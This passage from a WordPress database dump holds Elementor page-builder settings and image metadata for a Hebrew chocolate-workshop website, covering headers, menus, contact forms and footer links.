style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6478920\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#2d2d2d\"},\"elements\":[{\"id\":\"1db1127\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c5bd98f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05dc \\u05d4\\u05d6\\u05db\\u05d5\\u05d9\\u05d5\\u05ea \\u05e9\\u05de\\u05d5\\u05e8\\u05d5\\u05ea 2018 (c) - \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3<\\/p>\",\"text_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"88ba40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3f463b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: left;\\\">\\u05e9\\u05de\\u05d5\\u05dc: <span style=\\\"color: #ff9900;\\\"><a style=\\\"color: #ff9900;\\\" href=\\\"https:\\/\\/www.shmul.co.il\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u05e7\\u05d9\\u05d3\\u05d5\\u05dd \\u05d0\\u05ea\\u05e8\\u05d9\\u05dd \\u05d0\\u05d5\\u05e8\\u05d2\\u05e0\\u05d9<\\/a><\\/span><\\/p>\",\"text_color\":\"#fcfcfc\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(700,151,'_elementor_version','0.4'),(705,152,'_edit_last','1'),(706,152,'_edit_lock','1527245455:1'),(707,152,'_wp_page_template','default'),(708,152,'_yoast_wpseo_content_score','60'),(709,152,'_yoast_wpseo_primary_category','7'),(710,154,'_wp_attached_file','2018/05/pregnent-choclate.jpg'),(711,154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:630;s:4:\"file\";s:29:\"2018/05/pregnent-choclate.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"pregnent-choclate-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"pregnent-choclate-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"pregnent-choclate-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"pregnent-choclate-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:29:\"pregnent-choclate-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(712,152,'_thumbnail_id','154'),(713,155,'_elementor_template_type','single'),(714,155,'_elementor_edit_mode','builder'),(715,155,'_edit_lock','1596644648:1'),(717,155,'_wp_page_template','default'),(718,155,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(719,155,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\",\"menu\":\"%d7%a8%d7%90%d7%a9%d7%99\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7c736ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"081917e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8afb22\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"1154d95\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"5797de9\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"author\",\"icon\":\"fa fa-user-circle-o\",\"_id\":\"0e28084\",\"date_format\":\"default\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"default\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\\u05e0\\u05db\\u05ea\\u05d1 \\u05e2\\\"\\u05d9 \",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"\",\"show_icon\":\"default\",\"custom_text\":\"\",\"custom_url\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"selected_icon\":{\"value\":\"\",\"library\":\"\"}},{\"type\":\"date\",\"icon\":\"fa fa-calendar\",\"_id\":\"b1560e5\",\"date_format\":\"3\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"default\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"yes\",\"show_icon\":\"default\",\"custom_text\":\"\",\"custom_url\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"selected_icon\":{\"value\":\"\",\"library\":\"\"}},{\"type\":\"time\",\"icon\":\"fa fa-clock-o\",\"_id\":\"2e36932\",\"date_format\":\"default\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"2\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"yes\",\"show_icon\":\"default\",\"custom_text\":\"\",\"custom_url\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"selected_icon\":{\"value\":\"\",\"library\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":27},\"icon_align\":\"left\"},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"f3418e3\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"8142c60\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\",\"recaptcha_badge\":\"bottomright\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"yaaripe@gmail.com\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"